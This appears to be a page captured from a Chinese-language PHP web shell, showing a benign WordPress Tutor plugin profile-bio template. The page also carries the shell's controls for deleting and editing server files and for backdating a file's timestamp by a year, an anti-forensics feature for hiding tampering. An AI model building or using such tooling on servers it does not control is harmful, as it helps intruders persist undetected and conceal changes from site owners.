文件操作 - bio.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/tutor/templates/profile/bio.php
编辑文件内容
<?php /** * Profile Bio Template * * @package Tutor\Templates * @subpackage Profile * @author Themeum <support@themeum.com> * @link https://themeum.com * @since 1.4.3 */ $user_name = sanitize_text_field( get_query_var( 'tutor_profile_username' ) ); $get_user = tutor_utils()->get_user_by_login( $user_name ); $user_id = $get_user->ID; $profile_bio = get_user_meta( $user_id, '_tutor_profile_bio', true ); if ( $profile_bio ) { ?> <?php echo wp_kses_post( wpautop( $profile_bio ) ); ?> <?php } else { esc_html_e( 'Bio data is empty', 'tutor' ); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件